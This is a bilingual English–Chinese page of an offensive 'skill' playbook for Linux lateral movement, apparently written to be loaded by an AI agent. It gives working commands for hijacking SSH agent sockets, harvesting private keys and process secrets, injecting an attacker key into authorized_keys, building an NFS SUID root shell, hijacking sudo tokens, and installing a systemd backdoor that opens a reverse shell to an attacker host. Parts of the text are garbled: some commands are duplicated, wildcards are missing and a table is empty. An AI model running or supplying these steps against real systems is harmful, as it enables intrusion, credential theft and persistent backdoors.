linux-lateral-movement
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: Linux Lateral Movement — Expert Attack Playbook
SKILL: Linux 横向移动 —— 专家级攻击手册
AI LOAD INSTRUCTION: Expert Linux lateral movement techniques. Covers SSH agent hijacking, key harvesting, credential locations, D-Bus exploitation, network pivoting, sudo token reuse, and systemd manipulation. Base models miss SSH_AUTH_SOCK hijacking and ptrace-based sudo session hijack.
AI加载说明:专家级Linux横向移动技术,覆盖SSH Agent劫持、密钥窃取、凭证位置查找、D-Bus漏洞利用、网络穿透、sudo令牌复用和systemd操作。基础模型缺失SSH_AUTH_SOCK劫持和基于ptrace的sudo会话劫持相关技术知识。
0. RELATED ROUTING
0. 相关技能指引
Before going deep, consider loading:
- linux-privilege-escalation if you need root on the current host before pivoting
- linux-security-bypass when restricted shells or security modules block lateral movement tools
- container-escape-techniques when the target network includes containerized hosts
- kubernetes-pentesting when pivoting into a Kubernetes cluster
- unauthorized-access-common-services for exploiting discovered internal services (Redis, MongoDB, etc.)
深入学习前,可考虑加载以下技能:
- linux-privilege-escalation:如果跳转前需要在当前主机获取root权限
- linux-security-bypass:当受限shell或安全模块拦截横向移动工具时使用
- container-escape-techniques:当目标网络包含容器化主机时使用
- kubernetes-pentesting:当需要跳转进入Kubernetes集群时使用
- unauthorized-access-common-services:用于利用发现的内网服务(Redis、MongoDB等)
1. SSH AGENT HIJACKING
1. SSH AGENT劫持
1.1 Find SSH Agent Sockets
1.1 查找SSH Agent套接字
bash
undefinedbash
undefinedAs root (or user with access to other users' processes):
以root身份(或有权限访问其他用户进程的用户)执行:
find /tmp -path "/ssh-" -name "agent.*" 2>/dev/null
find /tmp -path "/ssh-" -name "agent.*" 2>/dev/null
Or via /proc:
或者通过/proc路径查找:
grep -r SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'
grep -r SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'
Typical path: /tmp/ssh-XXXXXX/agent.PID
典型路径:/tmp/ssh-XXXXXX/agent.PID
undefinedundefined1.2 Hijack Agent Forwarding
1.2 劫持Agent转发
bash
undefinedbash
undefinedSet the found socket as our auth agent
将找到的套接字设置为我们的认证代理
export SSH_AUTH_SOCK=/tmp/ssh-AbCdEf/agent.12345
export SSH_AUTH_SOCK=/tmp/ssh-AbCdEf/agent.12345
List available keys in the agent
列出代理中可用的密钥
ssh-add -l
ssh-add -l
If keys appear → we can use them
如果有密钥显示 → 我们就可以使用这些密钥
SSH to any host this agent can authenticate to
SSH登录该Agent可认证的任意主机
ssh -o StrictHostKeyChecking=no user@internal-host
ssh -o StrictHostKeyChecking=no user@internal-host
The agent owner won't notice — we're using their forwarded agent
Agent的所有者不会察觉 —— 我们使用的是他们转发的Agent
undefinedundefined1.3 Persistent Agent Monitoring
1.3 持久化Agent监控
bash
undefinedbash
undefinedMonitor for new SSH agent sockets (wait for admin to SSH in)
监控新的SSH Agent套接字(等待管理员SSH登录)
inotifywait -m /tmp -e create 2>/dev/null | grep ssh-
inotifywait -m /tmp -e create 2>/dev/null | grep ssh-
Or poll:
或者轮询查找:
while true; do
find /tmp -path "/ssh-" -name "agent.*" -newer /tmp/.marker 2>/dev/null
touch /tmp/.marker
sleep 5
done
---while true; do
find /tmp -path "/ssh-" -name "agent.*" -newer /tmp/.marker 2>/dev/null
touch /tmp/.marker
sleep 5
done
---2. SSH KEY HARVESTING
2. SSH密钥窃取
2.1 Private Key Locations
2.1 私钥存储位置
bash
find / -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" -o -name "*.key" 2>/dev/nullbash
find / -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" -o -name "*.key" 2>/dev/nullAlso: /etc/ssh/ssh_host__key (MITM), /home//.ssh/id_*
还有:/etc/ssh/ssh_host__key(用于中间人攻击), /home//.ssh/id_*
Find keys without passphrase:
查找无密码的私钥:
for key in $(find / -name "id_" ! -name ".pub" 2>/dev/null); do
ssh-keygen -y -P "" -f "$key" > /dev/null 2>&1 && echo "NO PASSPHRASE: $key"
done
undefinedfor key in $(find / -name "id_" ! -name ".pub" 2>/dev/null); do
ssh-keygen -y -P "" -f "$key" > /dev/null 2>&1 && echo "无密码保护:$key"
done
undefined2.2 known_hosts Parsing
2.2 known_hosts解析
bash
undefinedbash
undefinedHashed known_hosts (common default):
哈希后的known_hosts(常见默认配置):
cat ~/.ssh/known_hosts
cat ~/.ssh/known_hosts
May be hashed — use ssh-keygen to check against known IPs:
可能是哈希值 —— 用ssh-keygen对照已知IP检查:
ssh-keygen -F 10.0.0.1 -f ~/.ssh/known_hosts
ssh-keygen -F 10.0.0.1 -f ~/.ssh/known_hosts
Unhashed known_hosts → direct IP/hostname list
未哈希的known_hosts → 直接获取IP/主机名列表
awk '{print $1}' ~/.ssh/known_hosts | sort -u
awk '{print $1}' ~/.ssh/known_hosts | sort -u
Extract all hostnames/IPs from all users' known_hosts
从所有用户的known_hosts中提取所有主机名/IP
cat /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null
| awk '{print $1}' | tr ',' '\n' | sort -u
| awk '{print $1}' | tr ',' '\n' | sort -u
undefinedcat /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null
| awk '{print $1}' | tr ',' '\n' | sort -u
| awk '{print $1}' | tr ',' '\n' | sort -u
undefined2.3 authorized_keys Injection
2.3 authorized_keys注入
bash
undefinedbash
undefinedGenerate attacker keypair (on attacker box)
在攻击机上生成攻击者密钥对
ssh-keygen -t ed25519 -f /tmp/pivot_key -N ""
ssh-keygen -t ed25519 -f /tmp/pivot_key -N ""
Inject public key (on compromised host)
在已攻陷主机上注入公钥
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /root/.ssh/authorized_keys
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /home/admin/.ssh/authorized_keys
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /root/.ssh/authorized_keys
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /home/admin/.ssh/authorized_keys
SSH back in with our key
用我们的密钥SSH登录目标主机
ssh -i /tmp/pivot_key root@target
---ssh -i /tmp/pivot_key root@target
---3. CREDENTIAL HARVESTING LOCATIONS
3. 凭证窃取位置
3.1 System Credentials
3.1 系统凭证
| Location | Contents | Command |
|---|---|---|
| Password hashes | |
| User list, may contain hashes | |
| Command history (passwords in cleartext) | |
| MySQL commands with passwords | |
| PostgreSQL commands | |
| PostgreSQL password file | |
| MySQL credentials | |
| FTP/HTTP auto-login credentials | |
| Git HTTPS passwords | |
| 位置 | 内容 | 命令 |
|---|---|---|
| 密码哈希 | |
| 用户列表,可能包含哈希 | |
| 命令历史(可能包含明文密码) | |
| 带密码的MySQL命令 | |
| PostgreSQL命令 | |
| PostgreSQL密码文件 | |
| MySQL凭证 | |
| FTP/HTTP自动登录凭证 | |
| Git HTTPS密码 | |
3.2 Environment & Config Files
3.2 环境变量与配置文件
bash
undefinedbash
undefinedCurrent process secrets
当前进程的敏感信息
env | grep -iE "pass|key|secret|token|api|cred|auth"
env | grep -iE "pass|key|secret|token|api|cred|auth"
All process environments (root):
所有进程的环境变量(需root权限):
for pid in /proc/[0-9]*; do
cat $pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "pass|key|secret|token"
done
for pid in /proc/[0-9]*; do
cat $pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "pass|key|secret|token"
done
Application configs (common credential locations):
应用配置文件(常见凭证存储位置):
find /var/www /opt /srv -name "wp-config.php" -o -name "settings.py"
-o -name "*.env" -o -name "database.yml" -o -name "docker-compose.yml" 2>/dev/null
-o -name "*.env" -o -name "database.yml" -o -name "docker-compose.yml" 2>/dev/null
find /var/www /opt /srv -name "wp-config.php" -o -name "settings.py"
-o -name "*.env" -o -name "database.yml" -o -name "docker-compose.yml" 2>/dev/null
-o -name "*.env" -o -name "database.yml" -o -name "docker-compose.yml" 2>/dev/null
Keyrings & secret stores:
密钥环与秘密存储:
find / -name ".keyring" -o -name ".vault-token" -o -path "/.password-store/*.gpg" 2>/dev/null
---find / -name ".keyring" -o -name ".vault-token" -o -path "/.password-store/*.gpg" 2>/dev/null
---4. D-BUS EXPLOITATION
4. D-BUS漏洞利用
4.1 Enumerate D-Bus Services
4.1 枚举D-Bus服务
bash
undefinedbash
undefinedList system bus services
列出系统总线服务
dbus-send --system --dest=org.freedesktop.DBus
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
dbus-send --system --dest=org.freedesktop.DBus
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
List session bus services
列出会话总线服务
dbus-send --session --dest=org.freedesktop.DBus
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
dbus-send --session --dest=org.freedesktop.DBus
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
--type=method_call --print-reply
/org/freedesktop/DBus org.freedesktop.DBus.ListNames
Introspect a service (find available methods)
自省服务(查找可用方法)
dbus-send --system --dest=org.freedesktop.systemd1
--type=method_call --print-reply
/org/freedesktop/systemd1 org.freedesktop.DBus.Introspectable.Introspect
--type=method_call --print-reply
/org/freedesktop/systemd1 org.freedesktop.DBus.Introspectable.Introspect
undefineddbus-send --system --dest=org.freedesktop.systemd1
--type=method_call --print-reply
/org/freedesktop/systemd1 org.freedesktop.DBus.Introspectable.Introspect
--type=method_call --print-reply
/org/freedesktop/systemd1 org.freedesktop.DBus.Introspectable.Introspect
undefined4.2 Abuse systemd & PolicyKit via D-Bus
4.2 通过D-Bus滥用systemd与PolicyKit
bash
undefinedbash
undefinedStart a service via D-Bus (if policy allows):
如果策略允许,通过D-Bus启动服务:
dbus-send --system --dest=org.freedesktop.systemd1
--type=method_call --print-reply /org/freedesktop/systemd1
org.freedesktop.systemd1.Manager.StartUnit
string:"malicious.service" string:"replace"
--type=method_call --print-reply /org/freedesktop/systemd1
org.freedesktop.systemd1.Manager.StartUnit
string:"malicious.service" string:"replace"
dbus-send --system --dest=org.freedesktop.systemd1
--type=method_call --print-reply /org/freedesktop/systemd1
org.freedesktop.systemd1.Manager.StartUnit
string:"malicious.service" string:"replace"
--type=method_call --print-reply /org/freedesktop/systemd1
org.freedesktop.systemd1.Manager.StartUnit
string:"malicious.service" string:"replace"
polkit actions available without auth:
无需认证即可使用的polkit动作:
pkaction --verbose 2>/dev/null | grep -B5 "implicit active: yes"
---pkaction --verbose 2>/dev/null | grep -B5 "implicit active: yes"
---5. INTERNAL NETWORK PIVOTING
5. 内网穿透
5.1 SSH Tunneling
5.1 SSH隧道
bash
undefinedbash
undefinedLocal port forward: access INTERNAL_HOST:3306 via localhost:3306
本地端口转发:通过localhost:3306访问INTERNAL_HOST:3306
ssh -L 3306:INTERNAL_HOST:3306 pivot@compromised-host
ssh -L 3306:INTERNAL_HOST:3306 pivot@compromised-host
Remote port forward: expose attacker service to internal network
远程端口转发:将攻击机服务暴露到内网
ssh -R 8080:ATTACKER:8080 pivot@compromised-host
ssh -R 8080:ATTACKER:8080 pivot@compromised-host
Dynamic SOCKS proxy: route all traffic through pivot
动态SOCKS代理:将所有流量通过跳转主机路由
ssh -D 1080 pivot@compromised-host
ssh -D 1080 pivot@compromised-host
Then: proxychains nmap -sT INTERNAL_RANGE
然后执行:proxychains nmap -sT INTERNAL_RANGE
SSH over SSH (multi-hop):
SSH多层跳转:
ssh -J user1@hop1,user2@hop2 target@final-host
undefinedssh -J user1@hop1,user2@hop2 target@final-host
undefined5.2 Without SSH — Alternative Tunnels
5.2 无SSH替代隧道方案
bash
undefinedbash
undefinedsocat port forward
socat端口转发
socat TCP-LISTEN:8080,fork TCP:INTERNAL_HOST:80 &
socat TCP-LISTEN:8080,fork TCP:INTERNAL_HOST:80 &
ncat relay
ncat中继
ncat -l -p 8080 --sh-exec "ncat INTERNAL_HOST 80"
ncat -l -p 8080 --sh-exec "ncat INTERNAL_HOST 80"
/dev/tcp (Bash built-in, no tools needed)
/dev/tcp(Bash内置功能,无需额外工具)
exec 3<>/dev/tcp/INTERNAL_HOST/80
echo -e "GET / HTTP/1.0\r\nHost: INTERNAL_HOST\r\n\r\n" >&3
cat <&3
exec 3<>/dev/tcp/INTERNAL_HOST/80
echo -e "GET / HTTP/1.0\r\nHost: INTERNAL_HOST\r\n\r\n" >&3
cat <&3
chisel (SOCKS proxy over HTTP)
chisel(基于HTTP的SOCKS代理)
On attacker: chisel server -p 8080 --reverse
攻击机执行:chisel server -p 8080 --reverse
On target: chisel client ATTACKER:8080 R:socks
目标机执行:chisel client ATTACKER:8080 R:socks
undefinedundefined5.3 Network Discovery from Compromised Host
5.3 从已攻陷主机进行网络发现
bash
ss -tlnp && ss -tnp # Listening & established connections
arp -a && ip neigh # Known adjacent hosts
cat /etc/resolv.conf # DNS servers
dig axfr internal.domain @dns 2>/dev/null # Zone transferbash
ss -tlnp && ss -tnp # 监听中与已建立的连接
arp -a && ip neigh # 已知相邻主机
cat /etc/resolv.conf # DNS服务器
dig axfr internal.domain @dns 2>/dev/null # 区域传输Subnet sweep (bash-only, no tools):
子网扫描(仅用bash,无需额外工具):
for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i &>/dev/null && echo "ALIVE: 10.0.0.$i" & done; wait
for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i &>/dev/null && echo "存活:10.0.0.$i" & done; wait
Port scan via /dev/tcp:
通过/dev/tcp端口扫描:
for port in 22 80 443 3306 5432 6379 8080; do
(echo >/dev/tcp/10.0.0.1/$port) 2>/dev/null && echo "OPEN: $port"
done
---for port in 22 80 443 3306 5432 6379 8080; do
(echo >/dev/tcp/10.0.0.1/$port) 2>/dev/null && echo "端口开放:$port"
done
---6. SHARED FILESYSTEM EXPLOITATION
6. 共享文件系统漏洞利用
6.1 NFS Mounts
6.1 NFS挂载
bash
undefinedbash
undefinedDiscover NFS shares
发现NFS共享
showmount -e FILESERVER_IP 2>/dev/null
showmount -e FILESERVER_IP 2>/dev/null
Check for no_root_squash (root maps to root)
检查是否开启no_root_squash(root用户映射为远程root)
mount -t nfs FILESERVER_IP:/share /mnt/nfs
mount -t nfs FILESERVER_IP:/share /mnt/nfs
If no_root_squash: create SUID binaries visible to other hosts
如果开启no_root_squash:创建其他主机可见的SUID二进制文件
All hosts mounting the same share → SUID binary = root on all hosts
所有挂载同一份共享的主机 → SUID二进制文件 = 所有主机的root权限
cp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash
undefinedcp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash
undefined6.2 SMB/CIFS Shares
6.2 SMB/CIFS共享
bash
undefinedbash
undefinedEnumerate shares
枚举共享
smbclient -L //FILESERVER_IP/ -N 2>/dev/null # Null session
smbclient -L //FILESERVER_IP/ -U 'user%password'
smbclient -L //FILESERVER_IP/ -N 2>/dev/null # 空会话
smbclient -L //FILESERVER_IP/ -U 'user%password'
Mount and search for credentials
挂载并搜索凭证
mount -t cifs //FILESERVER_IP/share /mnt/smb -o username=user,password=pass
find /mnt/smb -name ".conf" -o -name ".cfg" -o -name ".kdbx"
-o -name ".xlsx" -o -name "*.docx" 2>/dev/null
-o -name ".xlsx" -o -name "*.docx" 2>/dev/null
---mount -t cifs //FILESERVER_IP/share /mnt/smb -o username=user,password=pass
find /mnt/smb -name ".conf" -o -name ".cfg" -o -name ".kdbx"
-o -name ".xlsx" -o -name "*.docx" 2>/dev/null
-o -name ".xlsx" -o -name "*.docx" 2>/dev/null
---7. SUDO TOKEN REUSE (ptrace-Based)
7. SUDO令牌复用(基于ptrace)
bash
undefinedbash
undefinedIf another user has an active sudo session (timestamp not expired):
如果其他用户有活跃的sudo会话(时间戳未过期):
And we can ptrace their process (same UID or root)
且我们可以ptrace该用户的进程(相同UID或root权限)
Check sudo timestamp files:
检查sudo时间戳文件:
ls -la /var/run/sudo/ts/ 2>/dev/null
ls -la /var/db/sudo/ 2>/dev/null
ls -la /var/run/sudo/ts/ 2>/dev/null
ls -la /var/db/sudo/ 2>/dev/null
Files here mean active sudo tokens
存在文件说明有活跃的sudo令牌
ptrace-based hijack:
基于ptrace的劫持:
Attach to the user's shell process
附加到用户的shell进程
Inject: sudo /bin/bash
注入:sudo /bin/bash
The injected sudo inherits the valid timestamp → no password needed
注入的sudo会继承有效时间戳 → 无需密码
Automated tool: sudo_inject
自动化工具:sudo_inject
Injects into processes with valid sudo tokens
可注入带有有效sudo令牌的进程
---
---8. SYSTEMD SERVICE MANIPULATION
8. SYSTEMD服务操纵
bash
undefinedbash
undefinedFind writable unit files:
查找可写的单元文件:
find /etc/systemd /usr/lib/systemd -writable -name "*.service" 2>/dev/null
find /etc/systemd /usr/lib/systemd -writable -name "*.service" 2>/dev/null
Inject into existing service (add ExecStartPre=):
注入到现有服务(添加ExecStartPre=配置):
Or create new: /etc/systemd/system/backdoor.service
或者创建新服务:/etc/systemd/system/backdoor.service
[Service] Type=oneshot ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
[Service] Type=oneshot ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
systemctl daemon-reload && systemctl enable --now backdoor.service
---systemctl daemon-reload && systemctl enable --now backdoor.service
---9. LATERAL MOVEMENT DECISION TREE
9. 横向移动决策树
Compromised host — where to move next?
│
├── SSH credentials available?
│ ├── Private keys found? → try on all known_hosts targets (§2)
│ ├── SSH agent running? → hijack socket (§1)
│ ├── Passwords in history/configs? → spray across hosts (§3)
│ └── authorized_keys writable on other hosts? → inject key (§2.3)
│
├── Network services discovered?
│ ├── Internal web apps? → tunnel + attack (§5.1)
│ ├── Databases (3306/5432/6379)? → check harvested creds (§3)
│ ├── SMB/NFS shares? → mount + search for creds/SUID (§6)
│ └── Kubernetes API (6443)? → load kubernetes-pentesting skill
│
├── Can reach other hosts?
│ ├── Direct SSH? → use keys/passwords
│ ├── Firewalled? → SSH tunnel or chisel (§5)
│ └── No tools? → /dev/tcp + bash (§5.2)
│
├── Root on current host?
│ ├── Read /etc/shadow → crack hashes → password reuse (§3)
│ ├── Dump /proc/*/environ → find service credentials (§3.2)
│ ├── Hijack sudo tokens → piggyback admin sessions (§7)
│ └── Modify systemd services → backdoor (§8)
│
├── D-Bus services available?
│ ├── Privileged services exposed? → method call abuse (§4)
│ └── polkit actions without auth? → privilege actions (§4.3)
│
└── No obvious path?
├── ARP scan + port sweep internal network (§5.3)
├── Passive credential sniffing (if cap_net_raw)
├── Wait for admin SSH → agent hijack (§1.3)
└── Check for cloud metadata (169.254.169.254)已攻陷主机——下一步该跳转至哪里?
│
├── 是否有可用SSH凭证?
│ ├── 找到私钥? → 在所有known_hosts目标上尝试使用(§2)
│ ├── SSH Agent正在运行? → 劫持套接字(§1)
│ ├── 历史记录/配置文件中有密码? → 在多台主机上喷洒尝试(§3)
│ └── 其他主机的authorized_keys可写? → 注入公钥(§2.3)
│
├── 是否发现网络服务?
│ ├── 内网Web应用? → 隧道+攻击(§5.1)
│ ├── 数据库(3306/5432/6379)? → 使用窃取的凭证尝试登录(§3)
│ ├── SMB/NFS共享? → 挂载+搜索凭证/SUID文件(§6)
│ └── Kubernetes API(6443)? → 加载kubernetes-pentesting技能
│
├── 是否可以访问其他主机?
│ ├── 可直接SSH? → 使用密钥/密码登录
│ ├── 有防火墙拦截? → SSH隧道或chisel(§5)
│ └── 无可用工具? → /dev/tcp + bash(§5.2)
│
├── 当前主机是否有root权限?
│ ├── 读取/etc/shadow → 破解哈希 → 密码复用(§3)
│ ├── 导出/proc/*/environ → 查找服务凭证(§3.2)
│ ├── 劫持sudo令牌 → 复用管理员会话(§7)
│ └── 修改systemd服务 → 留后门(§8)
│
├── 是否有可用D-Bus服务?
│ ├── 暴露了高权限服务? → 方法调用滥用(§4)
│ └── 无需认证的polkit动作? → 执行高权限操作(§4.3)
│
└── 无明确路径?
├── ARP扫描+端口扫描内网(§5.3)
├── 被动凭证嗅探(如果有cap_net_raw权限)
├── 等待管理员SSH登录 → Agent劫持(§1.3)
└── 检查云元数据(169.254.169.254)